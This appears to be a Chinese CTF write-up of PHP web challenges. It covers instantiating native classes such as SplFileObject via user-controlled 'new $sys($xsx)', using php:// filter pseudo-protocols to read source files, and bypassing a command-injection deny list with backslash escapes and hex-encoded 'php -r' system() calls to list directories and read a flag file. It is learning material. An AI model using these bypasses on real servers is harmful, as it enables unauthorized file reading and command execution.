1.代码审计1
芝士点:1.原生类读取,形式:大部分是new $a($b)
2.伪协议的利用读全代码
<?php highlight_file(__FILE__); include('flag.php'); $sys = $_GET['sys']; if (preg_match("|flag|", $xsx)) { die("flag is no here!"); } else { $xsx = $_GET['xsx']; echo new $sys($xsx); } >这个php代码if语句第一部分不会成立,因为xsx还没赋值,所以没有过滤,如果有过滤,,我觉得通配符也可以绕过
一开始我构建sys=system&xsx=flag.php
不通过,因为system是原生函数,不是原生类,在new后面会报错
搜了 一下,可以利用的 原生类有:
1. SplFileObject
作用:PHP 标准库(SPL)中的文件对象类,用于逐行读取、操作文件,是处理文件的核心原生类。
2.File类(部分环境支持,依赖PECL File扩展)
作用:文件操作类,功能和SplFileObject类似,但并非所有 PHP 环境都内置(需要安装 PECL File 扩展)。等
当用文件目录遍历到了敏感文件时,可以用SplFileObject类,同样通过echo触发SplFileObject中的__toString()方法。(该类不支持通配符,所以必须先获取到完整文件名称才行)
但是我用了原生类也没 出来flag
看了wp:
除此之外其实SplFileObject类,只能读取文件的第一行内容,如果想要全部读取就需要用到foreach函数,但若题目中没有给出foreach函数的话,就要用伪协议读取文件的内容。
伪协议解决问题的原理是:伪协议会一次性读取文件全部内容并处理为单行数据流,让SplFileObject的 “第一行” 等于文件的全部内容
注:这里又跟文件包含那种执行不一样,include本身就是一次性读取全部文件内容,不存在 “只读取第一行” 的问题,伪协议在文件包含漏洞中不是为了 “解决单行限制”,而是为了绕过限制、读取源码或执行代码。
转成base64,使代码失去执行能力,变成字符串直接读出来
2.随机值
使用&符号,我觉得相当于指针地址符的用法,$a=&$b,把b的值赋值给a
所以可以获得flag
3.你知道sys还能这样玩吗
可以用御剑扫出来,,也可以根据题目提示sys尝试
<?php show_source(__FILE__); if(isset($_POST['cmd'])){ echo "<pre>"; $cmd = $_POST['cmd']; if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) { $output = system($cmd); echo $output; } echo "</pre>"; } ?>l\s执行成功,但是后面不知道怎么绕过了
但是没有对php过滤,可以考虑使用php -r 在终端执行php函数来实现二次命令执行
<?php // 要执行的命令 $command = ''; // 将命令转换为十六进制编码 $hexCommand = bin2hex($command); // 构造 PHP 代码,将十六进制命令解码后传递给 eval 函数执行 $phpCode = 'system(hex2bin("' . $hexCommand .'"));'; // 执行 PHP 代码 echo($phpCode); ?>依次执行命令,ls ../../../
发现flag.txt,,执行cat ../../../flag,.txt
